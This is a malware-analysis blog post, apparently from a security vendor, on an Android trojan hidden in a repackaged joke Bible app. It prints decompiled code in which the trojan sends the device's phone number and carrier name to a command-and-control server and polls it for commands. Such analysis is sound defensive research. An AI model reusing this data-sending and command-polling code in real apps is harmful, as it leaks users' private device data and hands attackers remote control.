A few days ago, a new malware named Android/Smspacem.A!tr appeared for Android users. This malware trojans a legitimate (but controversial) application named the Holy F***ing Bible. Its malicious behavior only appeared on May 21-22 and resulted in changing the device’s wallpaper and sends out anti-Christian joke SMS messages to all the user’s phone contacts. The malware also reacts to a few commands: “health” (SMS command), “formula401″ and “pacem” (Web service commands, obtained by polling a Web service on a Command & Control server). The actions the malware takes upon those commands are nicely illustrated here.
To my knowledge, processing commands via a Web service is a “first”. Below, we explain the code for those who are not extremely familiar with Web services:
SoapObject localSoapObject1 = new org/ksoap2/serialization/SoapObject;SoapObject localSoapObject2 = localSoapObject1;String str7 = “http://tempuri.org/”;String str8 = “openmic”;localSoapObject2.<init>(str7, str8);
This code is not very readable because it is the output of Dex to Java disassembler, but basically, we see here that the malware is instantiating a SOAP object. The documentation of org.ksoap2.serialization.SoapObject explains:
SoapObject(java.lang.String namespace, java.lang.String name)
So, http://tempuri.org is an XML namespace – it is not something malicious – and openmic corresponds to the method / Web service the malware wishes to call.
Then, the code goes on as follows:
String str9 = this.val$cellnumb;SoapObject localSoapObject3 = localSoapObject1;String str10 = “cell”;String str11 = str9;SoapObject localSoapObject4 = localSoapObject3.addProperty(str10, str11);String str12 = this.val$opname;SoapObject localSoapObject5 = localSoapObject1;String str13 = “opname”;String str14 = str12;SoapObject localSoapObject6 = localSoapObject5.addProperty(str13, str14);
This code shows that two properties are added to the SOAP object: a property named “cell” which contains the phone number of the infected device and a property named “opname” which corresponds to the operator’s name. Both values (phone number and operator name) are collected by the malware at startup.
Then, the malware needs to send this SOAP object to a remote website. To do so, it serializes the object (let’s skip the code corresponding to this part but, in brief, it ends up in an envelope named localSoapSerializationEnvelope1. Then, below, we see it sends the SOAP object via HTTP to a remote address (controlled by the attacker – a simple C&C server)
http://[REMOVED].no-ip.biz/talktome.asmx
Finally, it waits for an answer from that C&C (such as “formula401″ and “pacem”).
AndroidHttpTransport localAndroidHttpTransport1 = new org/ksoap2/transport/AndroidHttpTransport;AndroidHttpTransport localAndroidHttpTransport2 = localAndroidHttpTransport1;String str15 = “http://[REMOVED].no-ip.biz/talktome.asmx”;localAndroidHttpTransport2.(str15);AndroidHttpTransport localAndroidHttpTransport3 = localAndroidHttpTransport1;String str16 = “http://tempuri.org/openmic”;SoapSerializationEnvelope localSoapSerializationEnvelope4 = localSoapSerializationEnvelope1;localAndroidHttpTransport3.call(str16, localSoapSerializationEnvelope4);String str17 = ((SoapPrimitive) localSoapSerializationEnvelope1.getResponse()).toString();
I support Irfan Asrar’s opinion that this malware targets US end-users. I would even go a bit further by saying that the malware author lives in the US. In fact, as Asrar noted too, there are several references to the Colbert Report, an American satirical late night television program:
- on May 21, the malware sets an image of Stephen Colbert as wallpaper
- formula401 refers to a famous title show of the Colbert Report
- the Android malware is named holycolbert10.apk
A technical hint also suggests that the author might live in the US: the C&C appears to be located in Miami.
Also, it very much looks like the IP address goes to a personal website of a home user (DSL). The author could very well be a talented developer with a strange sense of humor (and little ethics), which would explain why this malware does not really look like the ones Fortinet usually analyzes: in particular, there does not seem to be any financial motivation behind this malware, just something to “show off” (?) or annoy a few people.
We want to remind our readers that this kind of malware author is getting very scarce. These days, malware authors write their malicious code for money, not for fun or for technical pride.
– the Crypto Girl.
Leave a reply
